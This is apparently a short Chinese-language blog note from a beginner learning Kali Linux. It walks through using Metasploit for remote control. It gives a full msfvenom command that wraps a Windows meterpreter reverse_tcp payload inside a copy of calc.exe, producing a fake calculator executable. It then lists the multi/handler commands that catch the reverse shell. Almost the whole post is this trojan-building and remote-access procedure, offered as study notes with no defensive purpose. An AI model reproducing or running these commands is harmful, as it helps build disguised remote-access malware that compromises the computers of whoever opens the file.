kali的学习笔记篇(四)metasploit之远控

看的是15年的老电影了(教程)

msfpayload 15年就被丢弃了,搞了才发现被集成到msfvenom里了。

生成木马:

#参数 -p [指定攻击载荷名称]
#参数 -f [指定payload的输出格式]
#参数 -x 指定捆绑到哪个文件上
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=[myIP] LPORT=[myPORT] -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

win10不能执行,待今晚装完win7测试回来修改结果。

#执行handler模块
 use exploit/multi/handler
#装载攻击载荷添加反向tcp链接
set PAYLOAD windows/meterpreter/reverse_tcp
#反弹会话IP
set LHOST [myIP]
#反弹会话端口
set LPORT [myPORT]
#执行exploit

 

事实表明是模块没用好。嘻嘻新手踩大坑了-。-

你可能感兴趣的:(kali,卡莉咖喱)